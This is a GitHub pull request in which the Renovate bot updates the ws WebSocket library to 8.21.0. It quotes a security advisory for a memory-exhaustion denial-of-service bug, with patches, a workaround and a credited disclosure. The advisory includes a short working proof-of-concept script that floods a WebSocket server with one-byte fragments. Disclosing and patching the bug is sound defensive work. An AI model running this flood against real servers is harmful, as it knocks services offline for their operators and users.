Skip to content

chore(deps): update dependency ws to v8.21.0 [security]#8310

Open
renovate[bot] wants to merge 1 commit into
mainfrom
renovate/npm-ws-vulnerability
Open

chore(deps): update dependency ws to v8.21.0 [security]#8310
renovate[bot] wants to merge 1 commit into
mainfrom
renovate/npm-ws-vulnerability

Conversation

@renovate

@renovate renovate Bot commented Jun 17, 2026

Copy link
Copy Markdown
Contributor

This PR contains the following updates:

Package Change Age Confidence
ws 8.20.18.21.0 age confidence

ws: Memory exhaustion DoS from tiny fragments and data chunks

CVE-2026-48779 / GHSA-96hv-2xvq-fx4p

More information

Details

Impact

A high volume of exceptionally small fragments and data chunks can be sent by a peer, with modest network traffic, to force the remote peer into allocating and holding structural wrappers that consume far more memory than the default documented message-size limit, leading to process termination due to OOM.

Proof of concept
import { WebSocket, WebSocketServer } from 'ws';

const wss = new WebSocketServer({ port: 0 }, function () {
  const data = Buffer.alloc(1);
  const options = { fin: false };
  const { port } = wss.address();
  const ws = new WebSocket(`ws://localhost:${port}`);

  ws.on('open', function () {
    (function send() {
      ws.send(data, options, function (err) {
        if (err) return;
        send();
      });
    })();
  });

  ws.on('error', console.error);
  ws.on('close', function (code, reason) {
    console.log(`client close - code: ${code} reason: ${reason.toString()}`);
  });
});

wss.on('connection', function (ws) {
  ws.on('error', console.error);
  ws.on('close', function (code, reason) {
    console.log(`server close - code: ${code} reason: ${reason.toString()}`);
  });
});
Patches

The vulnerability was fixed in ws@8.21.0 (websockets/ws@bca91ad) and backported to ws@7.5.11 (websockets/ws@fd36cd8), ws@6.2.4 (websockets/ws@86d3e8a), and ws@5.2.5 (websockets/ws@b5372ac).

Workarounds

In vulnerable versions, the issue can be mitigated by lowering the value of the maxPayload option if possible.

Credits

The vulnerability was responsibly disclosed and fixed by Nadav Magier.

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

Release Notes

websockets/ws (ws)

v8.21.0

Compare Source

Configuration

📅 Schedule: (UTC)

  • Branch creation
    • At any time (no schedule defined)
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Enabled.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate Bot requested a review from a team as a code owner June 17, 2026 14:16
@renovate renovate Bot added dependencies Pull requests that update a dependency file javascript Pull requests that update Javascript code labels Jun 17, 2026
@renovate renovate Bot enabled auto-merge (squash) June 17, 2026 14:17
@github-actions

github-actions Bot commented Jun 17, 2026
edited
Loading

Copy link
Copy Markdown

📊 Benchmark results

Comparing with 35d52f5

  • Dependency count: 1,127 (no change)
  • Package size: 379 MB ⬆️ 0.00% increase vs. 35d52f5
  • Number of ts-expect-error directives: 352 (no change)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@kodiakhq kodiakhq[bot] kodiakhq[bot] approved these changes

Assignees

No one assigned

Labels

dependencies Pull requests that update a dependency file javascript Pull requests that update Javascript code

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

0 participants